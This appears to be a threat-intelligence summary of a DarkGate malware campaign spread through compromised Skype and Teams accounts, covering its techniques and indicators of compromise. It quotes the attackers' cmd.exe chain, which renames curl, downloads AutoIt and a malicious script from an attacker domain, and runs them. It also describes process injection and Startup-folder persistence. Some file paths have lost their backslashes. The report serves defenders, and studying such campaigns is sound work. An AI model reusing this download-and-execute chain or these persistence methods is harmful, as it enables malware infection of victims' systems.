Keypoints
- From July–September, attackers used compromised Skype and Teams accounts to send malicious attachments (VBS/VBA and .LNK) that masquerade as PDF files or trusted supplier documents.
- Initial loader is a VBS/VBA script (executed via wscript.exe) that creates a random directory, copies curl.exe to a random-named executable, and uses it to download AutoIt3.exe and a malicious .au3 script.
- The campaign hosts payloads on a remote server (reactervnamnat[.]com) and runs cmd.exe to execute chained commands that retrieve and launch AutoIt and the DarkGate AU3 payload.
- The compiled AutoIt (.au3) performs environment checks, decrypts and executes the DarkGate payload, then spawns legitimate-looking processes (iexplore.exe, GoogleUpdateBroker.exe, Dell.D3.WinSvc.UILauncher.exe) and injects shellcode to run in memory.
- Persistence is achieved by dropping a randomly named .lnk file in the user Startup folder and storing encrypted logs/configs under %ProgramData% in randomly named directories.
- Post-install activity includes dropping additional payloads (DarkGate/Remcos variants) under C:Intel and %appdata%Adobe to expand foothold; sample names include Folkevognsrugbrd.exe and logbackup_0.exe.
MITRE Techniques
- [T1566] Phishing – Initial access via messages from compromised Skype/Teams accounts with malicious attachments to trick recipients into opening files (‘the threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script.’).
- [T1204] User Execution – Victims are socially engineered to run VBS/VBA or LNK files masquerading as PDFs (‘the message containing a deceptive VBS script with a file name … tricks the user into believing the file is a .PDF document’).
- [T1059.005] Command and Scripting Interpreter: VBScript – The VBA/VBS loader executes via wscript.exe and runs cmd.exe chains to perform download and execution (‘Trend Vision One™ detected the loading of the VBA script via its execution using the Windows native wscript.exe’).
- [T1105] Ingress Tool Transfer – Use of curl (renamed copy) to download AutoIt3.exe and the malicious .au3 script from reactervnamnat[.]com (‘zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz’).
- [T1055] Process Injection – The AU3 payload injects shellcode into surrogate processes (iexplore.exe, GoogleUpdateBroker.exe, Dell.D3.WinSvc.UILauncher.exe) to run DarkGate in memory (‘These are injected with shellcode to execute the DarkGate payload in memory.’).
- [T1547.001] Boot or Logon Autostart Execution – Persistence via a randomly named .lnk file dropped to the Windows User Startup folder to auto-run on login (‘dropping a randomly named LNK file to the Windows User Startup folder, enabling automatic execution’).
- [T1027] Obfuscated Files or Information – The campaign uses obfuscated command lines and AutoIt compilation to hinder analysis (‘addition of obfuscation to its command lines’).
Indicators of Compromise
- [Domain] hosting and download server – reactervnamnat[.]com (used to serve AutoIt3.exe and malicious .au3 files).
- [IP] embedded in LNK command – 185.39.18.170 (observed in the obfuscated cmd chain contacting a remote host for hm3.vbs).
- [Files/Artifacts] loader and script names – hm3.vbs, BzpXNT.au3 (loader VBS and downloaded AutoIt script examples).
- [File paths] persistence and storage – %ProgramData%{7char}{7char}… (random folders for logs and settings) and Startup folder .lnk path (auto-run shortcut in user Startup folder).
- [Dropped payload names] secondary executables – Folkevognsrugbrd.exe, logbackup_0.exe, and other variants (used to expand foothold; also observed Remcos variants).
- [Archive/LNK filenames] social engineering lure – Significant company changes September.zip containing Company_Transformations.pdf.lnk and other similarly named .lnk files.
Attackers delivered DarkGate via social-engineered IM messages (Skype and Teams) and SharePoint-hosted ZIPs that contained deceptive attachments: VBS/VBA scripts or .LNK files named to appear as PDFs. The VBS/VBA loader is executed using wscript.exe and immediately creates a randomly named directory, copies the legitimate Windows curl.exe to a randomly named executable, then invokes cmd.exe to run chained commands. One observed command chain used the copied curl to download AutoIt3.exe and a malicious AU3 script and then launched AutoIt to execute that script (example chain: “C:WindowsSystem32cmd.exe” /c mkdir c:zohn & cd /d c:zohn & copy C:windowssystem32curl.exe zohn.exe & zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3).
The compiled AutoIt (.au3) performs environment checks (ensuring %ProgramFiles% exists and the username is not SYSTEM), decrypts and loads the DarkGate payload, then spawns legitimate-sounding surrogate processes (iexplore.exe, GoogleUpdateBroker.exe, Dell.D3.WinSvc.UILauncher.exe) and injects shellcode into them to execute the payload in memory. For persistence, the malware drops a randomly named .lnk file into the user’s Startup folder and creates a randomly named ProgramData directory to store encrypted logs and configuration files (paths use generated seven-character strings). Investigators can use tools such as the Telekom Security extractor to dump DarkGate config files.
After installation DarkGate acts as a downloader, dropping additional payloads (examples: Folkevognsrugbrd.exe, logbackup_0.exe, sdvbs.exe) under C:Intel and %appdata%Adobe to diversify access (including observed Remcos variants). The overall technical chain relies on social engineering to trigger user execution, command-shell download/execution via a copied curl binary, AutoIt-based payload execution, in-memory process injection, startup LNK persistence, and encrypted local storage for logs/settings.